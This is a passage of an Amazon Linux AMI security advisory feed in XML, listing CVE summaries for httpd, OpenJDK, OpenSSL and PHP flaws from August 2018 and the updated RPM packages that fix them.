</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3615" title="" id="CVE-2018-3615" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3620" title="" id="CVE-2018-3620" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3646" title="" id="CVE-2018-3646" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5391" title="" id="CVE-2018-5391" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.62" release="65.117.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.62" 
release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.62-65.117.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1062</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1062: medium priority package update for httpd24</title><issued date="2018-08-22 18:56:00" /><updated date="2018-08-23 17:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-8011:
By specially crafting HTTP requests, the mod_md challenge handler would dereference a NULL pointer and cause the child process to segfault. This could be used to DoS the server. Fixed in Apache HTTP Server 2.4.34 (Affected 2.4.33).
1605052:
CVE-2018-8011 httpd: mod_md: NULL pointer dereference causing httpd child process crash
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8011" title="" id="CVE-2018-8011" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_proxy_html" version="2.4.34" release="1.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.34" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.34" release="1.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.34" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.34-1.82.amzn1.noarch.rpm</filename></package><package name="httpd24-tools" version="2.4.34" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.34" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.34" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.34" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.34" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.34" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.34" 
release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.34" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.34" release="1.82.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.34" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.34" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.34" release="1.82.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.34" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.34" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.34" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.34-1.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1064</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1064: medium priority package update for java-1.7.0-openjdk</title><issued date="2018-08-22 18:58:00" /><updated date="2018-08-23 17:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2952:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are Java SE: 6u191, 7u181, 8u172 and 10.0.1; Java SE Embedded: 8u171; JRockit: R28.3.18. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1600925:
CVE-2018-2952 OpenJDK: insufficient index validation in PatternSyntaxException getMessage() (Concurrency, 8199547)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2952" title="" id="CVE-2018-2952" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.191-2.6.15.4.82.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.191-2.6.15.4.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.191-2.6.15.4.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.191-2.6.15.4.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.191-2.6.15.4.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.191-2.6.15.4.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.191-2.6.15.4.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.191-2.6.15.4.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.191" 
release="2.6.15.4.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.191-2.6.15.4.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.191-2.6.15.4.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.191-2.6.15.4.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1065</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1065: medium priority package update for openssl</title><issued date="2018-08-22 18:59:00" /><updated date="2018-08-23 17:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-0739:
Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe. Fixed in OpenSSL 1.1.0h (Affected 1.1.0-1.1.0g). Fixed in OpenSSL 1.0.2o (Affected 1.0.2b-1.0.2n).
1561266:
CVE-2018-0739 openssl: Handling of crafted recursive ASN.1 structures can cause a stack overflow and resulting denial of service
CVE-2018-0733:
Because of an implementation bug the PA-RISC CRYPTO_memcmp function is effectively reduced to only comparing the least significant bit of each byte. This allows an attacker to forge messages that would be considered as authenticated in an amount of tries lower than that guaranteed by the security claims of the scheme. The module can only be compiled by the HP-UX assembler, so that only HP-UX PA-RISC targets are affected. Fixed in OpenSSL 1.1.0h (Affected 1.1.0-1.1.0g).
1561260:
CVE-2018-0733 openssl: Implementation bug in PA-RISC CRYPTO_memcmp function allows attackers to forge authenticated messages in a reduced number of attempts
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0733" title="" id="CVE-2018-0733" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739" title="" id="CVE-2018-0739" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-12.110.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-12.110.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-12.110.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-12.110.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-12.110.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-12.110.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-12.110.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-12.110.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-12.110.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" 
release="12.110.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-12.110.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1066</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1066: low priority package update for php56 php70 php71</title><issued date="2018-08-22 19:30:00" /><updated date="2018-08-23 17:33:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14883:
An issue was discovered in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8. An Integer Overflow leads to a heap-based buffer over-read in exif_thumbnail_extract of exif.c.
1609637:
CVE-2018-14883 php: exif: integer overflow leading to out-of-bound buffer read in exif_thumbnail_extract()
CVE-2018-14851:
exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.
1609642:
CVE-2018-14851 php: exif: buffer over-read in exif_process_IFD_in_MAKERNOTE()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14851" title="" id="CVE-2018-14851" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14883" title="" id="CVE-2018-14883" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-ldap" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.37" release="1.139.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-cli-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.37" release="1.139.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-soap-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package 
name="php56-ldap" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.37" release="1.139.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-gd-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.37" 
release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-common" 
version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.31" release="1.30.amzn1" epoch="0" 